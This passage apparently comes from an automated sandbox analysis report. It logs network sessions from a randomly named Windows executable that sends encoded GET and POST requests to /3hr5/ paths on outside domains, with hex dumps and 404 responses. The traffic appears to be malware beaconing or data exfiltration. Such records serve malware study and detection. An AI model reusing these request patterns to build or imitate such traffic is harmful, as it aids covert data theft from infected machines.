vjP+lQUwsuuHBdzdPcLEK9Q/M8eDQLhZa6V0von/NVpHgUJ7UFspKkNdfJVZxK82dXta3hvfULhd/GL29bzmuzV8sUkX0VMg/DSDsXvaC9831hosobybtJo2eBbRvl0QtTwlN/zvq2kqz/e+kr+6e0ovEjlWjT7EmuU7M/UsYqt03X1PvSu677R1ZERGme5uarLnzCJE6iNU7mQs7AIhVNhgFu6MWob18mIQl3cj5OLubsLkCSOq0z2j8jPPTolYHaZ4SJqxumd2cOnmwql21s+jH+txLRoApX6OfGOOEVDyFaBy5WBSI41KsIpMUZzHcZlKe0
                                                                                                                              Dec 4, 2023 15:26:20.686585903 CET6484OUTData Raw: 56 73 36 63 33 71 49 59 76 4e 49 54 54 58 58 46 65 4a 78 34 36 42 61 64 43 67 65 47 4d 76 61 31 47 66 64 31 4a 44 77 52 37 7a 74 6b 56 32 56 6a 6d 79 39 38 6e 70 58 72 66 47 58 75 53 63 75 2b 54 69 4a 6a 39 63 41 72 31 4d 71 53 74 72 6a 6b 57 66
                                                                                                                              Data Ascii: Vs6c3qIYvNITTXXFeJx46BadCgeGMva1Gfd1JDwR7ztkV2Vjmy98npXrfGXuScu+TiJj9cAr1MqStrjkWfJ1kXP41B5FoZawjvGbYJlBI2PmRWalMHfsG4gNNaQeW7JuA8EnTvrufAFIpS5bHYQDYztlsIJfUHrjmX0bN1Jf6eIjRtQ5hF22HRXCyLxS5v3hUKP06deLHOwTUhtkgSO0yWsIKS3yIMEG3Cw9laqfcOB/3lMh8jw
                                                                                                                              Dec 4, 2023 15:26:20.811073065 CET2626OUTData Raw: 6a 6c 7a 77 6c 54 54 66 5a 42 38 59 59 69 41 54 49 33 4c 71 33 43 6c 76 56 6b 68 6f 48 35 38 6b 52 6e 75 2f 72 37 4c 41 33 6d 6e 57 33 78 77 56 46 2b 7a 70 78 6c 45 4a 64 74 35 6c 41 49 33 4e 64 57 46 77 50 50 65 36 46 52 71 77 67 56 2b 50 44 74
                                                                                                                              Data Ascii: jlzwlTTfZB8YYiATI3Lq3ClvVkhoH58kRnu/r7LA3mnW3xwVF+zpxlEJdt5lAI3NdWFwPPe6FRqwgV+PDt1UtGemmPTk96wov9GXD+2VVdIC3XvB952g38vn9TPtkZJNsgA0UrnyLF4ifkw16MQur+JW4RGdvA4Maenks/vj4K6Ri95cLvHQNKJzv0mRjIEGPKBKwMtWO/8KcWIFWLYASCZCug6KPs4576CsNEt6AvUHTExayLC
                                                                                                                              Dec 4, 2023 15:26:20.811235905 CET5198OUTData Raw: 39 64 65 4a 64 4a 7a 5a 68 33 61 43 6f 66 54 37 4a 31 68 30 37 49 6f 4a 72 33 51 4e 6b 65 5a 4c 6c 34 50 36 69 67 79 58 47 37 6e 38 6c 76 63 30 76 39 65 34 69 4f 6a 64 6a 2b 57 74 57 66 6d 33 43 4f 69 78 53 6c 4d 4f 54 78 77 75 71 69 6a 6b 6b 42
                                                                                                                              Data Ascii: 9deJdJzZh3aCofT7J1h07IoJr3QNkeZLl4P6igyXG7n8lvc0v9e4iOjdj+WtWfm3COixSlMOTxwuqijkkBxwgRV89IQHGJHKkzx9tOUJsVbgO7nAPz9hi+LqFDm0k112FVikShVX5nV6ZNii14wFEg2FQcyKop3SdH16oxulvq7gxeaJDUFBhdRRB0My8yERUtVOdwl/qSfGVOLY0tpV4lGFQkLd+D9/xOAZ8KniV5uvXsc+k6W
                                                                                                                              Dec 4, 2023 15:26:20.811400890 CET2626OUTData Raw: 50 6e 7a 4d 64 75 6e 74 47 4a 35 4e 79 46 58 56 33 69 69 6d 75 37 54 48 6c 30 55 65 6b 39 2f 6e 58 41 59 46 35 73 53 65 71 7a 37 68 6a 35 54 71 32 55 38 58 30 53 41 4e 73 69 70 78 63 46 4b 2f 79 30 2b 78 58 6e 56 77 77 71 6e 64 61 45 41 69 2b 6c
                                                                                                                              Data Ascii: PnzMduntGJ5NyFXV3iimu7THl0Uek9/nXAYF5sSeqz7hj5Tq2U8X0SANsipxcFK/y0+xXnVwwqndaEAi+lDyTqv8bs4HkA4i2WD208KAk58rlhTxk7nWn85XLSB8hPV3MB4hf4yIYpPDjugeuMXNB3yusqLZUWmbc/HeK2fvosjbN/tZYZkiKVe0m0HoRnsLCkF8xO6J4ZlIjZsBWTmMQkenqxDhooDu4X9sRecT7RGLDIeuBCQ
                                                                                                                              Dec 4, 2023 15:26:20.811578035 CET7770OUTData Raw: 49 56 67 70 6d 4b 36 75 47 47 4b 56 4c 48 2b 66 41 44 33 2f 72 42 50 78 6e 77 73 52 73 55 50 51 37 37 4a 75 56 68 2b 2b 4a 54 74 69 6c 35 79 45 53 35 58 77 37 4b 79 55 7a 4d 37 36 48 59 51 39 63 58 2f 32 4d 65 4f 49 47 64 30 62 34 66 39 37 4a 48
                                                                                                                              Data Ascii: IVgpmK6uGGKVLH+fAD3/rBPxnwsRsUPQ77JuVh++JTtil5yES5Xw7KyUzM76HYQ9cX/2MeOIGd0b4f97JHXjvtRr8jkv7diXdhJoLYo1UXpZ6TBZjg5Bs5QigPtI5n+T4ga6KJGqKqYZATV+cb6cCAim4dANRAAvBYPQXIT+ntLp4m3iTtvs0BAGa3qlt4KGQoAMPK59jYBI/cg/iF0TYfyNPExyXWeDtgD5eJg3haQCrSvSCbN
                                                                                                                              Dec 4, 2023 15:26:20.811744928 CET5198OUTData Raw: 66 34 44 6e 78 63 33 4a 33 41 68 62 66 59 6a 45 5a 64 50 79 31 52 2f 39 38 6d 4d 2f 6e 37 74 35 38 59 78 7a 62 54 50 52 4e 4a 41 35 48 32 2f 75 46 72 79 31 55 4e 69 6e 76 44 46 6f 50 65 6c 6a 5a 6d 52 68 6a 38 44 6b 34 45 4d 61 6a 31 47 47 4e 35
                                                                                                                              Data Ascii: f4Dnxc3J3AhbfYjEZdPy1R/98mM/n7t58YxzbTPRNJA5H2/uFry1UNinvDFoPeljZmRhj8Dk4EMaj1GGN5vS1RLqTgB01rG9gM8hDQO87CasmGp/AR08ULyp1cEVrddrv19o6rpXXT+FvBozYbahZOHZ4YekFOr7+14PRj+uQqruGikdUzRT7akMFgaJ5gmmxt4m7rjzGtLLa3WP1XhbCi5edAjIPMqMWJZFXrYTIIoJaImjSvj
                                                                                                                              Dec 4, 2023 15:26:20.811986923 CET2626OUTData Raw: 6b 4f 30 5a 55 39 71 57 37 36 69 43 79 44 62 4f 74 6f 42 59 56 6d 66 2f 51 41 32 6a 6d 50 34 65 49 48 73 4f 4c 57 6c 4f 6b 55 33 7a 44 48 66 62 6e 6e 63 4e 42 41 75 4c 31 55 54 68 52 49 57 48 38 39 74 54 55 30 79 4e 6b 42 4c 43 4d 63 50 4f 67 74
                                                                                                                              Data Ascii: kO0ZU9qW76iCyDbOtoBYVmf/QA2jmP4eIHsOLWlOkU3zDHfbnncNBAuL1UThRIWH89tTU0yNkBLCMcPOgto9Eh/sOaPztvykIOVCMhD5Q9SWing8IFoB7W97otlIC2PHVMhiDwnSC6T4UT3QlS60q82Ysg+xWzLTDg2AH5BK1LFg1arf/goUNgjvNKhBMH6FsrPHNhvs8m+dgO4fV6R3X0yry6enc2xwTGHl9re7z7oClw9h39W
                                                                                                                              Dec 4, 2023 15:26:20.942143917 CET2626OUTData Raw: 37 6d 70 33 42 38 32 49 32 4e 51 7a 33 6d 38 77 72 43 54 33 31 76 52 47 4b 41 55 6f 73 6c 31 51 66 53 6f 6f 56 47 30 43 32 56 67 74 64 51 62 61 6f 36 48 36 7a 62 4f 66 4e 32 64 54 34 41 48 6f 76 56 42 6d 55 34 70 6a 4c 57 4f 4c 74 49 50 64 47 6b
                                                                                                                              Data Ascii: 7mp3B82I2NQz3m8wrCT31vRGKAUosl1QfSooVG0C2VgtdQbao6H6zbOfN2dT4AHovVBmU4pjLWOLtIPdGkh7kI4HswGBqW9ZTnZv82/He7bkXwX8tFoxpSdHNNRUr3mI0VqJjDx7+rDqS1kSbAQ5l4kSt5yJ5o0u4PU3Q/XtQBpRWX6tv9Zd26XJUoFJC6ekBylGvAFOhUEuJYo1ur64kXkAwVPTiCNLFsV2EMuNnliTU5F+2no
                                                                                                                              Dec 4, 2023 15:26:20.942338943 CET2626OUTData Raw: 4e 48 36 33 2b 71 5a 74 49 56 39 7a 6e 58 56 54 48 31 73 6b 67 59 78 6c 4d 55 39 64 48 73 6d 30 50 4d 32 77 31 39 65 36 5a 39 66 53 38 33 49 67 48 50 6d 64 32 42 38 52 61 37 64 42 76 39 69 5a 71 36 78 77 73 33 75 53 39 75 42 42 79 55 72 69 56 4d
                                                                                                                              Data Ascii: NH63+qZtIV9znXVTH1skgYxlMU9dHsm0PM2w19e6Z9fS83IgHPmd2B8Ra7dBv9iZq6xws3uS9uBByUriVMjiujOugkdnLqbIPC1wxDgiZs4A2YXdc4fs8j5RLG+ZDYkqlhvAu6GpEcxuu+7nr+uAxb2sc6n+4fIFTjHsjwnLObBF/wTWHN7KZ3Q3c3c+rS+3bKj8OeRXHixGbzTU6iNGP5EcjvgElUld/eqY3zrBLby1SNtY9Wm
                                                                                                                              Dec 4, 2023 15:26:20.942500114 CET9829OUTData Raw: 77 78 50 42 6d 6f 65 67 62 37 63 39 6f 48 35 5a 30 58 33 47 69 38 63 47 6c 32 42 6e 78 65 4a 58 32 31 67 69 65 76 65 56 35 62 68 43 50 41 6e 50 58 58 75 35 33 38 45 31 55 36 34 71 35 4d 56 38 79 43 44 59 73 48 5a 35 65 35 77 2f 52 6c 6b 4a 49 68
                                                                                                                              Data Ascii: wxPBmoegb7c9oH5Z0X3Gi8cGl2BnxeJX21gieveV5bhCPAnPXXu538E1U64q5MV8yCDYsHZ5e5w/RlkJIhKGo3cWTs75G6Dj49Ew/65rp67aVBAs9W/FR9JmCTsDfu0VxzguY74ZbAwTTK/gWrTr7Ta/L5jGnJHmvaemtWg6pPHYi3xM3oU4TmWLOVV8Pj3LemaDk0YlAxZvBdI7XptWEBFF28UEJSXOeMutmBzh3J01hM0GP+s
                                                                                                                              Dec 4, 2023 15:26:21.073816061 CET634INHTTP/1.1 404 Not Found
                                                                                                                              Content-Type: text/html
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: close
                                                                                                                              Date: Mon, 04 Dec 2023 14:26:20 GMT
                                                                                                                              Server: Apache
                                                                                                                              Content-Encoding: gzip
                                                                                                                              Data Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 77 12 d2 33 4e 01 95 1a 14 16 6d 15 e2 0a b1 79 af 9b 1a 9d 32 6e 0f 84 e3 ef ed cd 16 7a 6c 81 42 38 0a 8c 8b c6 c0 eb 60 9a 8a 61 ce b0 ef 31 e1 f3 c9 0b 6c 60 6d 75 72 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              57192.168.11.205018874.208.236.243808076C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 4, 2023 15:26:23.341065884 CET535OUTGET /3hr5/?TZd=C7q+sjkOjeHdW4KfX5XkOV+bb3qVpxl3Mz3wz487ZoyHEt9a0wBYazkTJk6RHURF+VscnNPsgG//B6D/+agfmiMJ8iKN4XKnaw==&1dr=yP5PQD38 HTTP/1.1
                                                                                                                              Host: www.homesteadmath.com
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Connection: close
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
                                                                                                                              Dec 4, 2023 15:26:23.470704079 CET824INHTTP/1.1 404 Not Found
                                                                                                                              Content-Type: text/html
                                                                                                                              Content-Length: 626
                                                                                                                              Connection: close
                                                                                                                              Date: Mon, 04 Dec 2023 14:26:23 GMT
                                                                                                                              Server: Apache
                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 22 3e 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 30 61 33 32 38 63 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 30 65 6d 3b 22 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 68 31 3e 0a 20 20 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 65 6d 3b 22 3e 0a 20 20 20 59 6f 75 72 20 62 72 6f 77 73 65 72 20 63 61 6e 27 74 20 66 69 6e 64 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 20 63 6f 72 72 65 73 70 6f 6e 64 69 6e 67 20 74 6f 20 74 68 65 20 55 52 4c 20 79 6f 75 20 74 79 70 65 64 20 69 6e 2e 0a 20 20 3c 2f 70 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Your browser can't find the document corresponding to the URL you typed in. </p> </body></html>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              58192.168.11.2050189216.40.34.41808076C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 4, 2023 15:26:36.932413101 CET807OUTPOST /3hr5/ HTTP/1.1
                                                                                                                              Host: www.ritualyoga.org
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Origin: http://www.ritualyoga.org
                                                                                                                              Referer: http://www.ritualyoga.org/3hr5/
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 184
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
                                                                                                                              Data Raw: 54 5a 64 3d 6f 47 2b 4f 4e 63 4b 67 63 4d 31 59 4b 6c 77 74 2b 31 42 77 65 67 4f 63 62 4e 74 54 37 66 4a 62 4f 54 33 34 66 6e 30 48 79 49 75 61 69 55 48 69 44 42 43 33 4c 64 6a 77 69 6c 42 4e 7a 41 2b 41 58 67 2f 74 67 58 2f 5a 39 4a 5a 75 72 6a 54 6d 51 35 62 77 6f 4d 7a 56 72 79 6d 52 77 75 70 49 2f 54 76 54 68 38 76 79 4e 4b 43 7a 36 52 47 52 41 4f 41 37 6d 49 2b 45 30 57 38 7a 52 61 34 69 56 77 4a 52 79 62 6f 6f 69 6d 69 57 30 2f 70 6c 63 75 31 58 55 66 58 31 53 4e 43 4f 2f 36 69 56 64 52 7a 2b 76 38 6d 66 50 53 75 66 46 59 36 73 38 41 3d 3d
                                                                                                                              Data Ascii: TZd=oG+ONcKgcM1YKlwt+1BwegOcbNtT7fJbOT34fn0HyIuaiUHiDBC3LdjwilBNzA+AXg/tgX/Z9JZurjTmQ5bwoMzVrymRwupI/TvTh8vyNKCz6RGRAOA7mI+E0W8zRa4iVwJRybooimiW0/plcu1XUfX1SNCO/6iVdRz+v8mfPSufFY6s8A==
                                                                                                                              Dec 4, 2023 15:26:37.070503950 CET1328INHTTP/1.1 404 Not Found
                                                                                                                              server: nginx/1.14.2
                                                                                                                              date: Mon, 04 Dec 2023 14:26:37 GMT
                                                                                                                              content-type: text/html; charset=UTF-8
                                                                                                                              transfer-encoding: chunked
                                                                                                                              x-request-id: a3913f17-101e-49c4-83a6-652cbf43d254
                                                                                                                              x-runtime: 0.026389
                                                                                                                              content-encoding: gzip
                                                                                                                              connection: close
                                                                                                                              Data Raw: 31 33 39 42 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 5c 6d 53 db c6 b7 7f 9f 4f b1 7f 33 b7 36 0d 96 1f 08 04 08 a6 e3 82 21 b4 09 e4 1a 27 4d 9b c9 b8 b2 b5 b6 55 64 c9 95 64 0c e9 ed 77 bf bf 73 76 57 5a d9 40 28 f4 be b8 33 09 d3 46 48 bb e7 f9 69 77 cf 66 ff 3f 47 e7 87 bd 5f df 75 c4 24 9d 06 07 cf f6 e9 2f 11 b8 e1 b8 55 92 61 89 5e 48 d7 3b 78 26 c4 fe 54 a6 ae 18 4e dc 38 91 69 ab 34 4f 47 d5 9d 92 a8 f1 a7 d4 4f 03 79 d0 1e a6 7e 14 8a c3 28 4c e3 28 08 64 bc 27 3a d7 43 39 e3 b7 43 77 3e 9e a4 fb 35 35 94 26 25 e9 0d 26 e1 49 88 41 e4 dd 88 bf f8 11 bf b8 c3 cb 71 1c cd 43 af 3a 8c 82 08 50 d6 8e db f4 f3 4a 0f 30 6f 37 37 37 cd ab a9 1b 8f fd 70 4f d4 67 d7 ea d5 df cf 32 c0 1b 62 b6 21 a2 60 43 cc f1 5f ea 65 78 46 a0 b3 3a 72 a7 7e 70 b3 27 26 32 b8 92 a9 3f 74 37 c4 95 8c 3d 37 c4 83 1b fb 2e a6 24 6e 98 54 13 19 fb 23 83 8d 67 26 fe 17 b9 07 72 1b 9b 06 a7 10 81 1f ca ea 44 fa e0 74 4f 34 76 96 88 99 c5 b2 88 5c 81 68 34 72 00 8b 89 9f ca 6a 32 73 87 80 8d f1 d5 45 ec ce 0a 1c e1 a5 33 88 ae 73 69 45 b1 47 92 06 10 91 44 81 ef 89 b5 4e a7 63 28 9d b9 9e e7 87 63 7c ce 24 23 c4 8a b0 84 58 f8 5e 3a d9 13 bb 5b cb 34 93 f6 65 9c 61 cb 14 52 3f c6 8f c1 92 6b 0c ba 3a dc 6a 1e 37 5f ac 10 50 77 b6 e4 54 34 e8 ff 05 7e 26 8d 0c 78 46 97 d3 c4 d0 0c 7a 51 a8 4e c3 00 10 c2 d2 03 66 14 c1 36 57 68 2e 12 56 80 da dc 5a 52 95 e3 c1 d8 fd 20 b9 4f cc 47 75 fa c9 64 c0 7a a8 c6 ae e7 cf 93 3d f1 22 d7 a9 61 0b 84 e7 f6 29 84 e7 27 b3 c0 85 e9 0d 82 68 78 69 c0 18 45 bc 5c 56 84 93 cc a7 80 94 bb 49 a6 5a 8c 14 8d 8c 01 72 26 a6 64 10 a5 69 34 2d 18 46 91 e2 db 08 d0 6e 93 b1 6f 9b ac e1 63 05 d5 9e 08 a3 50 16 c4 bf 36 84 8b b8 f0 86 dc 74 60 b4 e4 33 6c 8d 19 89 da 5b 33 03 6c d4 eb ff b5 6a 3a b7 98 8d 93 44 f3 78 28 c5 f7 ab d6 93 4b 3e 13 d1 72 58 30 b3 ff 32 21 67 d5 89 8e 76 e9 27 d3 6e 16 93 60 e1 9d 43 fa 79 80 c6 14 89 b6 0c 0b fe 68 5b 83 92 c8 2d 92 34 a4 3a 9e 8b f0 6b 08 b6 2c 7f 27 97 58 84 d0 35 0a a2 c5 9e 70 e7 69 b4 4a 7b 1e 4f 8f 8f 0b ea 72 fc 70 14 65 c0 73 b1 ad 78 6b 91 1a 87 9c a8 1f ce a7 03 19 5b ae b2 1a bf 8b 12 33 41 a4 dd ce 42 7a 2e 17 38 49 8e 35 33 e6 58 87 d4 3c c8 1d 1d 1d 19 06 53 79 9d 56 dd c0 1f 23 01 f0 c0 22 6f 44 e4 32 6f d5 40 8e 28 44 5b 51 71 39 f4 ae 02 d9 9b 90 80 f3 90 b0 ca e7 f1 36 fd ac ce 74 5c a4 c6 ab 9c 8a db 52 dc f1 21 fe 14 a7 4e 7c cf 93 61 86 30 73 d8 15 77 83 61 08 23 d5 dd 9d fa 6e 7d eb 95 f8 9b 6d db dd bb f2 13 e4 14 a4 bd 6c c4 f6 f6 76 f6 d9 49 63 e4 9a ea 28 76 a7 12 2a bc 75 8c e1 3b fb a8 23 a9 41 51 80 e1 24 32 90 c3 22 42 35 1e c3 b5 bb ad 21 bb a7 b2 9f ba 83 c0 c8 24 8b fd 4a 02 3a 40 80 a7 c0 9d 25 c8 85 e6 89 3e 33 9c 02 8c 94 d2 94 48 8d 6e 96 22 60 33 b7 1a cf f3 ee 87 80 dc 4a 61 53 cb 7c 09 90 91 fb dd 04 98 e9 e9 44 43 58 72 78 c5 5d 31 a3 e9 78 fa 20 a0 7e 38 9b a7 6b 89 74 e3 a1 c1 50 5d c8 c1 a5 0f 07 98 cd f0 da 0d a9 72 20 8f 18 f9 32 b8 8b 59 ae b7 ee 12 97 55 49 dc 2d 2e 0d 61 2f 4c 27 d5 e1 c4 0f bc 4a e4 79 eb 46 6c 76 b4 1c 35 e9 e7 0e a9 13 18 47 5e c3 3d fa 53 37 1d
                                                                                                                              Data Ascii: 139B\mSO36!'MUddwsvWZ@(3FHiwf?G_u$/Ua^H;x&TN8i4OGOy~(L(d':C9Cw>55&%&IAqC:PJ0o777pOg2b!`C_exF:r~p'&2?t7=7.$nT#g&rDtO4v\h4rj2sE3siEGDNc(c|$#X^:[4eaR?k:j7_PwT4~&xFzQNf6Wh.VZR OGudz="a)'hxiE\VIZr&di4-FnocP6t`3l[3lj:Dx(K>rX02!gv'n`Cyh[-4:k,'X5piJ{Orpesxk[3ABz.8I53X<SyV#"oD2o@(D[Qq96t\R!N|a0swa#n}mlvIc(v*u;#AQ$2"B5!$J:@%>3Hn"`3JaS|DCXrx]1x ~8ktP]r 2YUI-.a/L'JyFlv5G^=S7
                                                                                                                              Dec 4, 2023 15:26:37.070596933 CET1328INData Raw: 4e 64 b2 b1 a2 5b 1e 33 9a 7f f9 72 63 c6 ac a0 31 81 ed 0d 79 ff 49 14 c0 6b ba 91 f7 ab 0c 10 0c 0b 06 65 92 a2 aa 94 c8 30 2e 02 37 95 27 b1 bc 79 30 85 10 dc 83 88 cc e5 6b 89 23 77 dd 87 db 96 29 59 33 5b 42 71 21 36 75 e8 52 66 33 73 d3 49
                                                                                                                              Data Ascii: Nd[3rc1yIke0.7'y0k#w)Y3[Bq!6uRf3sI`1pj$RaRU_H^y},HSg,N S:\iAQ(dQz,+33<$L]$~4"[T#)y\$8l`IW
                                                                                                                              Dec 4, 2023 15:26:37.070698023 CET1328INData Raw: 3c 49 25 3a 9a 12 f4 9d c5 02 5b df 38 09 a0 bd 17 d5 3b c1 e3 e9 43 85 e8 f0 71 ec 56 7f 85 bf f6 6d ce 9c 00 0b e3 74 82 f7 cf 9f e7 c7 7b 16 eb 9f fc cf 0e 3a f6 3a 57 20 fa 8d 46 57 29 33 fa f2 46 7e 02 2b f3 c9 42 48 07 07 0e 34 e1 48 8e dc
                                                                                                                              Data Ascii: <I%:[8;CqVmt{::W FW)3F~+BH4HyV9M)S#hT)SG`KhOY?HT-|H[t{'hJ(mRb kMC.\elYl@Xc}#&RF~w@e@5bDX>%F'f-=J2
                                                                                                                              Dec 4, 2023 15:26:37.070709944 CET1328INData Raw: 4e 5d b0 5a bf dc 90 4c 50 f1 bb 55 ca 16 60 02 a0 f2 7a 7b 26 e7 b9 0b e5 83 f7 cd 2c e6 43 0b 35 a7 ba 07 00 28 a6 44 53 b0 43 09 5d a5 04 d3 34 b8 98 a0 e3 3e 8c a0 4c 8e 83 57 6e 30 97 c2 47 d4 82 ad 42 33 cc b2 fa 46 ec c2 8e 06 c1 9c dc 2b
                                                                                                                              Data Ascii: N]ZLPU`z{&,C5(DSC]4>LWn0GB3F+kg*z8V5e`Ey(`L9 Ui$*+U,z$Ml2Ce$OEBt_UbDb>yy}bN3dN6#l6;hG/*T#
                                                                                                                              Dec 4, 2023 15:26:37.070719004 CET259INData Raw: 22 8c aa dc 7b 6b 0f 3c ef 9e 9e 9c 9e 99 11 b4 ab bc 57 ab 2d 16 0b 07 3b f5 73 37 b8 89 c6 ae 13 c5 63 7b ca 87 4e f7 e2 f4 3c 9b 43 52 87 12 ea f6 90 8f fd e3 f3 ee 2f ed ee 51 e7 88 9e 0c f8 c6 6e c3 d9 dd 76 9a cd 97 f8 af be 21 56 7e c7 15
                                                                                                                              Data Ascii: "{k<W-;s7c{N<CR/Qnv!V~u/ga]~@v:Q8i!..LK=]w~O3!KMb|n9jev1a)F0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              59192.168.11.2050190216.40.34.41808076C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 4, 2023 15:26:39.573354006 CET1147OUTPOST /3hr5/ HTTP/1.1
                                                                                                                              Host: www.ritualyoga.org
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Origin: http://www.ritualyoga.org
                                                                                                                              Referer: http://www.ritualyoga.org/3hr5/
